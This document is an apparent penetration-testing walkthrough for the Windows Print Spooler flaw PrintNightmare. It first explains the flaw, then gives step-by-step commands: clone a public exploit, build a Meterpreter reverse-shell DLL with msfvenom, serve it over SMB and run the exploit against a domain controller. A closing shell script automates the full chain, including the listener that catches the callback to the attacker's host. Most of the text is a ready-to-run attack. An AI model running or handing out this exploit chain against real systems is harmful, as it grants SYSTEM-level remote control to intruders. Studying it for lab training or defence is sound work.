PrintNightmare

PrintNightmare (CVE-2021-34527, alongside the closely related CVE-2021-1675 that the exploit below is named after) is a critical vulnerability in the Windows Print Spooler service (spoolsv.exe). Any authenticated domain user can call RpcAddPrinterDriverEx over the MS-RPRN/MS-PAR RPC interfaces and make the spooler load an attacker-supplied "printer driver" DLL from a UNC path. The DLL runs inside the spooler as SYSTEM, so on an unpatched host (including domain controllers, which ran the spooler by default) a plain domain user gets remote code execution as SYSTEM.

1. Clone PrintNightmare Exploit Repository

Command:

git clone https://github.com/cube0x0/CVE-2021-1675.git
  • Description: Used to clone a PrintNightmare exploit using Git from a Linux-based host.


2. Install Required Impacket Version

Command:

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
  • Description: Ensures the exploit author's (cube0x0) fork of Impacket is installed. The exploit depends on that fork because it carries the MS-PAR/MS-RPRN structures and calls the script uses, so any previously installed Impacket is removed first to avoid two conflicting copies on the Linux-based host.


3. Check if Target is Vulnerable

Command:

rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'
  • Description: Lists the RPC interfaces the target registers with the endpoint mapper and filters for the two Print Spooler protocols, MS-RPRN (Print System Remote Protocol) and MS-PAR (Print System Asynchronous Remote Protocol); rpcdump prints them as [MS-RPRN] and [MS-PAR], so the pattern must include the hyphen. Both appearing means the spooler is running and reachable over RPC, which the exploit requires. It does not prove the host is unpatched: a patched spooler registers exactly the same interfaces. Performed from a Linux-based host.


4. Generate DLL Payload

Command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll
  • Description: Generates a 64-bit Meterpreter reverse TCP payload as a DLL. The target's spooler process loads it, so the architecture must match the target (x64 here). LHOST and LPORT are the attack host's address and the port on which a Metasploit multi/handler with the same payload must already be listening before the exploit is run, otherwise the callback is lost. Performed from a Linux-based attack host; the DLL only has to end up in the SMB share created in the next step.


5. Host DLL Payload Using SMB Server

Command:

sudo smbserver.py -smb2support CompData /path/to/payload_dir
  • Description: Starts an Impacket SMB server on the local Linux host and shares the directory containing backupscript.dll as CompData (smbserver.py shares a directory, not a single file, so point it at the folder holding the DLL). The target's Print Spooler fetches the DLL from this share when the exploit runs, so the server must stay up in its own terminal and the target must be able to reach the attack host on TCP 445. -smb2support is required because current Windows builds refuse SMB1, and sudo is needed to bind port 445. Performed from a Linux-based host.


6. Execute the Exploit

Command:

sudo python3 CVE-2021-1675.py inlanefreight.local/<username>:<password>@172.16.5.5 '\\10.129.202.111\CompData\backupscript.dll'
  • Description: Runs the exploit as the given domain user against 172.16.5.5 and passes the UNC path of the DLL on the attacker's share (keep the single quotes so the shell does not strip the backslashes). Any valid domain account is enough; local administrator rights on the target are not required. The spooler copies the DLL into its driver directory and loads it as SYSTEM, so the Meterpreter session that arrives at the handler runs with SYSTEM privileges. Performed from a Linux-based host.
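The six steps above, strung together in one POSIX shell wrapper. This is an added example, not code from the original page or from cube0x0's repository. Everything not on the page is an assumption: the function names, the constructed rpcdump.py sample used to exercise the pre-check offline, and that rpcdump.py, smbserver.py, msfvenom, msfconsole and CVE-2021-1675.py are on PATH. The live attack only runs when the script is invoked with `run`; the filter and UNC-path helpers can be tested without a target.

```shell
#!/bin/sh
# Added example (not part of the original page): wrapper for the PrintNightmare
# steps above. Assumed, not from the page: the helper names, the constructed
# rpcdump sample, and that the Impacket scripts, msfvenom and msfconsole are on PATH.

# Step 3 filter. Reads rpcdump.py output on stdin, prints the spooler protocol
# tags it finds (sorted, one per line) and returns 1 if neither is present.
# A hit means spoolsv is reachable over RPC, NOT that the host is unpatched:
# a patched spooler registers the same MS-RPRN and MS-PAR interfaces.
spooler_exposed() {
    hits=$(grep -E -o 'MS-RPRN|MS-PAR' | sort -u)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# Constructed sample of rpcdump.py output (interface UUIDs are the real ones,
# bindings are made up) so the filter can be checked without a target.
sample_rpcdump_output() {
    cat <<'EOF'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
          ncacn_ip_tcp:172.16.5.5[49691]

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:172.16.5.5[49691]
          ncacn_np:\\DC01[\pipe\spoolss]
EOF
}

# Builds the UNC path handed to the exploit: \\host\share\file
unc_payload_path() {
    printf '\\\\%s\\%s\\%s\n' "$1" "$2" "$3"
}

# Live pre-check (step 3) against one target IP.
check_target() {
    rpcdump.py "@$1" | spooler_exposed
}

# Steps 4-6. Arguments: domain/user:pass  attacker_ip  target_ip
run_printnightmare() {
    creds=$1; lhost=$2; rhost=$3
    share=CompData; dll=backupscript.dll; lport=8080
    check_target "$rhost" >/dev/null || { echo "spooler not reachable on $rhost" >&2; return 1; }
    # Step 4: payload DLL, x64 to match the target's spooler process.
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="$lhost" LPORT="$lport" -f dll > "$dll"
    # Handler must be listening before spoolsv loads the DLL and calls back.
    msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST $lhost; set LPORT $lport; run -j" &
    # Step 5: share the directory holding the DLL; the target fetches it over SMB.
    sudo smbserver.py -smb2support "$share" "$(pwd)" &
    sleep 5
    # Step 6: the spooler loads the DLL from the UNC path as SYSTEM.
    sudo python3 CVE-2021-1675.py "$creds@$rhost" "$(unc_payload_path "$lhost" "$share" "$dll")"
}

# Only touch the network when asked: sh wrapper.sh run 'inlanefreight.local/user:pass' 10.129.202.111 172.16.5.5
if [ "${1:-}" = run ]; then
    shift
    run_printnightmare "$@"
fi
```

The filter deliberately returns only a reachability verdict; confirming the patch state still requires running the exploit (or checking the target's patch level), which is why run_printnightmare treats the check as a gate, not as proof.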
